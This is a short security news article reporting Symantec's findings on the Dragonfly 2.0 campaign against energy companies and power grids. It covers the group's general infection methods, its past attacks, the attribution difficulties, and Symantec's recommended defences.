Dragonfly, a group of cybercriminals that has been in operation since at least 2011, may be preparing to launch new cyberattacks against energy companies, utilities and power grids in Europe and North America, according to cybersecurity solutions provider Symantec.
The "Dragonfly 2.0" campaign appears to have already started, Symantec said in a prepared statement. This campaign leverages multiple infection vectors to gain access to a network, including malicious emails, watering hole attacks and Trojanized software, Symantec indicated.
The earliest activity in the Dragonfly 2.0 campaign was a malicious email campaign that sent emails disguised as New Year's Eve party invitations to energy sector targets; these emails were sent in December 2015, Symantec noted.
Other recent Dragonfly energy sector cyberattacks include:
- Disruptions to Ukraine's power system in 2015 and 2016 that affected hundreds of thousands of people.
- Cyberattacks on the electricity grids in some European countries.
- Cyberattacks against companies that manage nuclear facilities in the United States.
Dragonfly hackers appear to be interested in learning how energy facilities operate and obtaining access to various operational systems, Symantec stated. With these capabilities, Dragonfly cybercriminals could sabotage or gain control of energy systems.
Although Symantec has identified Dragonfly, the company pointed out that it has been unable to determine who is behind the group's cyberattacks. Symantec said there are several reasons why this is the case:
- Dragonfly cybercriminals use generally available malware and "living off the land" tools like PowerShell and Bitsadmin.
- Dragonfly cybercriminals do not deploy zero-day attacks. Instead, Dragonfly cybercriminals rely exclusively on publicly available tools, which may be due to a lack of resources or their desire to avoid attribution.
- Dragonfly cybercriminals have launched malware attacks with code strings in both Russian and French.
To combat Dragonfly attacks, Symantec offered the following best practices:
- Use complex passwords that contain a mix of letters, numbers and special characters.
- Deploy a variety of systems that provide protection against a single point of failure.
- Create a security policy that guarantees all sensitive data is encrypted both at rest and in transit.
- Implement egress traffic filtering on perimeter devices to prevent traffic from leaving a network and moving onto the internet.
- Teach employees about the risks associated with phishing emails and other cyber threats.
Dragonfly represents "a highly experienced threat actor," Symantec stated. However, energy companies and other organizations that prepare for cyberattacks can minimize the risk of Dragonfly-related cyberattacks.